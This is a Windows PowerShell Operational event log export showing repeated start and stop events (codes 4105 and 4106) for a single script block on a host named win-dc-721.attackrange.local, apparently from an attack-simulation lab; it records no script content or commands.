SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472598
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472597
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472596
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472595
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472594
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472593
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472592
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472591
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472590
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472589
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472588
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472587
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472586
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472585
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472584
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472583
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472582
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472581
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472580
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472579
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472578
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472577
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472576
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472575
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472574
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472573
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472572
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472571
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472570
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472569
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472568
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472567
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472566
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472565
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472564
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472563
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472562
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472561
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472560
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472559
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472558
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472557
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472556
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472555
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472554
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472553
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472552
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472551
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472550
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472549
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472548
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472547
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472546
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472545
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472544
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
